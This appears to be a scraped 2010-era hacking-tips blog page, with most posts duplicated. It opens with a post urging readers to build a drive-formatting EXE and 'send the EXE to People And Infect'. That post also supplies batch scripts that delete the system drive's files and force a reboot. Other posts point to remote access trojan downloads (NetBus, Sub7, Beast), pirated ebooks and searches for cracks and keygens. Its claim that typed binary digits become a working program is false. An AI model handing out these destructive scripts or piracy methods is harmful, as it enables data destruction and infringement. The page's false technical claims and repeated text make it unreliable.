If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Friday, February 19, 2010
-: Ethical Hacking eBooks :-
-: Hacking Exposed-5 :-
One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.
Download (Size :- 18.5 MB)
-: Internet Denial Of Service :-
Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.
Download (Size :- 2.04 MB)
-: Computer Viruses For Dummies :-
It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book’s value price and compact size will make it irresistible to people who need to protect their home PC or network.
Download (Size :- 2.33 MB)
-: Hackin9 :-
This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.
Download (Size :- 1.78 MB)
One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.
Download (Size :- 18.5 MB)
-: Internet Denial Of Service :-
Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.
Download (Size :- 2.04 MB)
-: Computer Viruses For Dummies :-
It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book’s value price and compact size will make it irresistible to people who need to protect their home PC or network.
Download (Size :- 2.33 MB)
-: Hackin9 :-
This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.
Download (Size :- 1.78 MB)
Dangerous Google Searching Trick - How To Find Almost Everything Using Google
Hello Guys Today I Come Up with a Very interesting and Useful Thing. Today I Will Show You How to Find almost everything using google. This is not really a hack but really useful technique to search things using Google.
Using this Dangerous Searching Technique You will be able to find everything like music,movies,cracks,full softwares,games,keygens.... In short everything... So To Know More read on...
DANGEROUS SEARCHING TECHNIQUES
In this Technique I will Show you How To Find files Using Various Hosts such as rapidshare, megaupload, hotfile etc.... You can choose your favourite host that you want...
So Let's Say You want to Download a Game say "Need for speed" (or anyother thing of your choice)...
STEPWISE DESCRIPTION:
1. Go to the Site www.google.com
2. Now type "Need for Speed" .
3. Now after typing your query type "rapidshare.com/files" (without quotes) as shown below.
4. Now Click on Search and See the results. You will suprise to See the Exact Results.
This Technique can be used to download anything such as ebooks,music,movies,video songs,softwares,cracks,keygens etc....
NOTE: After the Search Results Appears Links That You Should avoid as they are a piece of Waste:
1.rapidlibrary.com
2.rsfile.com
3.fileshunt.com
4.rapidog.com
Always Prefer the Results on Page 2 .
You can similarly You can do the search for Hotfile.com
Also:
If you need links from megaupload type megaupload.com/?d= instead of rapidshare.com/files.
Hope that You all have Enjoyed It... If you have any Query You can leave Your Comments Below I will Help you to solve Your Problems.
Thanks! Enjoy Dangerous Searching techniques...
Using this Dangerous Searching Technique You will be able to find everything like music,movies,cracks,full softwares,games,keygens.... In short everything... So To Know More read on...
DANGEROUS SEARCHING TECHNIQUES
In this Technique I will Show you How To Find files Using Various Hosts such as rapidshare, megaupload, hotfile etc.... You can choose your favourite host that you want...
So Let's Say You want to Download a Game say "Need for speed" (or anyother thing of your choice)...
STEPWISE DESCRIPTION:
1. Go to the Site www.google.com
2. Now type "Need for Speed" .
3. Now after typing your query type "rapidshare.com/files" (without quotes) as shown below.
4. Now Click on Search and See the results. You will suprise to See the Exact Results.
This Technique can be used to download anything such as ebooks,music,movies,video songs,softwares,cracks,keygens etc....
NOTE: After the Search Results Appears Links That You Should avoid as they are a piece of Waste:
1.rapidlibrary.com
2.rsfile.com
3.fileshunt.com
4.rapidog.com
Always Prefer the Results on Page 2 .
You can similarly You can do the search for Hotfile.com
Also:
If you need links from megaupload type megaupload.com/?d= instead of rapidshare.com/files.
Hope that You all have Enjoyed It... If you have any Query You can leave Your Comments Below I will Help you to solve Your Problems.
Thanks! Enjoy Dangerous Searching techniques...
Create Your Own Instant Messenger Bot
-: Creating IM Bot :-
This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.
To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.
For this example, I have created a dummy bot called “insecure” that listens to your IM messages. To see this live, add insecure@bot.im to your GTalk buddy list and start chatting.
f you like to write a personal IM bot, just follow these simple steps:-
Step 1: Go to www.imified.com and register a new account with a bot.
Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.
Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
break;
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
break;
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "
from " . $_REQUEST['value2'] . ".
break;
}
?>
Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.
Step 4: Now login to your imified account, paste the script URL
Screen Name: insecure@bot.im
Bot Script URL: http://www.insecure.in/imbot.php
Step 5: Add that im bot your friends list. That’s it.
This is a very basic bot but the possibilities are endless.
For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion.
The TROJON HORSE
What is a Trojan ?
"A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia
"A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory
Types of Trojan :-
The different types of Trojan Horses are as follows-
1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.
2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.
3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer. This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.
4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.
5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.
6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.
7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual. In this case they are well known as "Zombies".
How Trojan Works ?
Trojans typically consist of two parts, a client part and a server part. When a victim (unknowingly) runs a Trojan server on his machine, the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan. The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well. When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.
It is necessary for the attacker to know the victim’s IP address to connect to his/her machine. Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.
Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.
How Trojan Horses Are Installed ?
Infection from Trojans is alarmingly simple. Following are very common ways to become infected that most computer users perform on a very regular basis.
§ Software Downloads
§ Websites containing executable content (ActiveX control)
§ Email Attachments
§ Application Exploits (Flaws in a web applications)
§ Social Engineering Attacks
The Removal :-
Antivirus software is designed to detect and delete Trojan horses ideally preventing them from ever being install
1) NetBus :-
§ Latest Version: NetBus 2.10 Pro
§ Developer: Carl-Fredrik Neikter
§ Default Port: 20034 (variable)
§ Language: Delphi
§ Operating System: Windows 95/98, NT4 or later
§ Type: Remote Access
§ Download: NB2ProBeta.zip
2) Back Orifice XP :-
§ Latest Version: BOXP Beta 7
§ Developer: Javier Aroche
§ Default Port: 15380
§ Language: Microsoft Visual C++ 6.0
§ Operating System: Windows 95/98/ME/NT/2000/XP
§ Type: Remote Access
§ Download: boxp_beta7_bin.zip
3) SubSeven / Sub7 :-
§ Latest Version: SubSeven 2.2
§ Developer: Mobman
§ Default Port: 1080, 1369, 5873, 27374 (variable)
§ Language: Delphi
§ Operating System: Windows 95/98/ME/NT/2000
§ Type: Remote Access, Keylogger, Eavesdropper, Sniffer, Proxy server, FTP server
§ Download: Subseven.2.2.zip
4) Beast :-
§ Latest Version: Beast 2.07
§ Developer: Tataye
§ Default Port: 6666
§ Language: Delphi
§ Operating System: Windows 95/98/ME/NT/2000/XP
§ Type: Remote Access, Keylogger
§ Download: Beast_2.07.rar
"A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia
"A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory
Types of Trojan :-
The different types of Trojan Horses are as follows-
1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.
2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.
3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer. This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.
4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.
5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.
6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.
7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual. In this case they are well known as "Zombies".
How Trojan Works ?
Trojans typically consist of two parts, a client part and a server part. When a victim (unknowingly) runs a Trojan server on his machine, the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan. The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well. When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.
It is necessary for the attacker to know the victim’s IP address to connect to his/her machine. Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.
Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.
How Trojan Horses Are Installed ?
Infection from Trojans is alarmingly simple. Following are very common ways to become infected that most computer users perform on a very regular basis.
§ Software Downloads
§ Websites containing executable content (ActiveX control)
§ Email Attachments
§ Application Exploits (Flaws in a web applications)
§ Social Engineering Attacks
The Removal :-
Antivirus software is designed to detect and delete Trojan horses ideally preventing them from ever being install
1) NetBus :-
§ Latest Version: NetBus 2.10 Pro
§ Developer: Carl-Fredrik Neikter
§ Default Port: 20034 (variable)
§ Language: Delphi
§ Operating System: Windows 95/98, NT4 or later
§ Type: Remote Access
§ Download: NB2ProBeta.zip
2) Back Orifice XP :-
§ Latest Version: BOXP Beta 7
§ Developer: Javier Aroche
§ Default Port: 15380
§ Language: Microsoft Visual C++ 6.0
§ Operating System: Windows 95/98/ME/NT/2000/XP
§ Type: Remote Access
§ Download: boxp_beta7_bin.zip
3) SubSeven / Sub7 :-
§ Latest Version: SubSeven 2.2
§ Developer: Mobman
§ Default Port: 1080, 1369, 5873, 27374 (variable)
§ Language: Delphi
§ Operating System: Windows 95/98/ME/NT/2000
§ Type: Remote Access, Keylogger, Eavesdropper, Sniffer, Proxy server, FTP server
§ Download: Subseven.2.2.zip
4) Beast :-
§ Latest Version: Beast 2.07
§ Developer: Tataye
§ Default Port: 6666
§ Language: Delphi
§ Operating System: Windows 95/98/ME/NT/2000/XP
§ Type: Remote Access, Keylogger
§ Download: Beast_2.07.rar
-: Chat with Friends through ms dos Command Prompt :-
1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
8) Now all you need to do is type your message and press Enter.
Start Chatting.......!
2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
8) Now all you need to do is type your message and press Enter.
Start Chatting.......!
Call Anywhere in the World From PC to Mobile For Free 100% Working Hack Using Skype and Yahoo Messanger Full Tutorial
Hello Guys Today I will Give you the Full Proofed Hack to Call From PC to Mobile without paying a Penny.
And this is 100% working and tested hack.
THINGS THAT YOU NEED TO MAKE FREE CALLS:
1.A Personal Computer(PC) With Headphones
2.Yahoo Messanger OR SKYPE OR Any Such Calling Software
3.A client Phone Number Whom You want to call.
All the Phone call Hacks provided upto Now are not Working One's . Now I have been Personally using This Hack for more than 15 days. And its Going Well.
HOW TO MAKE FREE CALLS ?
1. Download the latest Yahoo Messanger. OR Skype .
http://messenger.yahoo.com/download
2. Install The Yahoo Messanger and Login Into your yahoo Account.
3. Type the Following Number +18003733411 in the Red Box Shown Below and Press Enter.
4. After Pressing Enter a small Window will open showing Connecting a Call to that number . Shown Below
5. Now Listen the Call And Wait Untill She Say "Free Calls" .
6. When she Says Free Calls Use Your Microphone and Say Free Calls (Don't forgot to unmute your microphone Voice in Volume Properties By Right Click on Volume Icon in your Task Bar and then click on properties and then Advanced and then unclick mute button under Microphone).
7. As you say Free Calls You will be Able To make 5 minutes free call anywhere in the World.
Now Click on the Dialpad As Shown Below To dial the Number.
8. Now The Dial Pad Opens Like Below
9. Now Dial The Number In format Country code followed by friends number whom you want to call.
Example : 919457196088 where 91 is country code for India and 9457196088 is phone number.
After dialing wait 2 sec for phone call to connect . After that You can call Upto 5 minutes Unlimited.
This Was The Full Tutorial With Snapshot .
It has Been Recently Discovered That This also Works Perfectly With Skype and Other Such Free calling Softwares... For Skype Credit Goes To Our Sir Mohd. Qadeer .
For Skype Follow the Same Procedure..
Hello Guys a Great Update to the Above program Has Done.. You can Also Use Skype to make Free Calls . Follow the Same Procedure as for Yahoo Messanger... i.e.
MAKING FREE CALLS THROUGH SKYPE :
Steps:
1. Download the Skype
2. Sign up an account on skype.
3. Now Add +18003733411 to your Contacts.
4. Now Click on call Button On the Above Shown Number.
5. Now Listen the Call Carefully. When He/She says the Freee calls . At that time You also hav to say the Free calls . Now wait Untill she says type your Country Code First.. then u hav to daila the Number and ur Call will be connected .. Dont forget to add country code before it..
That's the Overall Procedure...
Sometimes It may say All Lines are Busy So Don't panic Yaar As Its A Free Service..
FOR SKYPE HACK CREDIT GOES TO OUR SIR Mohd.Qadeer.
If you Guys Having Any Problem Leave Your Comments Below.
And this is 100% working and tested hack.
THINGS THAT YOU NEED TO MAKE FREE CALLS:
1.A Personal Computer(PC) With Headphones
2.Yahoo Messanger OR SKYPE OR Any Such Calling Software
3.A client Phone Number Whom You want to call.
All the Phone call Hacks provided upto Now are not Working One's . Now I have been Personally using This Hack for more than 15 days. And its Going Well.
HOW TO MAKE FREE CALLS ?
1. Download the latest Yahoo Messanger. OR Skype .
http://messenger.yahoo.com/download
2. Install The Yahoo Messanger and Login Into your yahoo Account.
3. Type the Following Number +18003733411 in the Red Box Shown Below and Press Enter.
4. After Pressing Enter a small Window will open showing Connecting a Call to that number . Shown Below
5. Now Listen the Call And Wait Untill She Say "Free Calls" .
6. When she Says Free Calls Use Your Microphone and Say Free Calls (Don't forgot to unmute your microphone Voice in Volume Properties By Right Click on Volume Icon in your Task Bar and then click on properties and then Advanced and then unclick mute button under Microphone).
7. As you say Free Calls You will be Able To make 5 minutes free call anywhere in the World.
Now Click on the Dialpad As Shown Below To dial the Number.
8. Now The Dial Pad Opens Like Below
9. Now Dial The Number In format Country code followed by friends number whom you want to call.
Example : 919457196088 where 91 is country code for India and 9457196088 is phone number.
After dialing wait 2 sec for phone call to connect . After that You can call Upto 5 minutes Unlimited.
This Was The Full Tutorial With Snapshot .
It has Been Recently Discovered That This also Works Perfectly With Skype and Other Such Free calling Softwares... For Skype Credit Goes To Our Sir Mohd. Qadeer .
For Skype Follow the Same Procedure..
Hello Guys a Great Update to the Above program Has Done.. You can Also Use Skype to make Free Calls . Follow the Same Procedure as for Yahoo Messanger... i.e.
MAKING FREE CALLS THROUGH SKYPE :
Steps:
1. Download the Skype
2. Sign up an account on skype.
3. Now Add +18003733411 to your Contacts.
4. Now Click on call Button On the Above Shown Number.
5. Now Listen the Call Carefully. When He/She says the Freee calls . At that time You also hav to say the Free calls . Now wait Untill she says type your Country Code First.. then u hav to daila the Number and ur Call will be connected .. Dont forget to add country code before it..
That's the Overall Procedure...
Sometimes It may say All Lines are Busy So Don't panic Yaar As Its A Free Service..
FOR SKYPE HACK CREDIT GOES TO OUR SIR Mohd.Qadeer.
If you Guys Having Any Problem Leave Your Comments Below.
Calculations On Command Prompt
the command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:
C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7
Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.
For more information, type set /? at the command prompt.
C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7
Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.
For more information, type set /? at the command prompt.
Subscribe to:
Comments (Atom)